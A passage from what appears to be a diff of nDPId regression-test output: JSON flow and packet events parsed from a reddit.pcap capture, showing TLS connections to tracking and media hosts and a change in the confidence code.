+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="} 
-00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="} -00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="} 
-00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="} 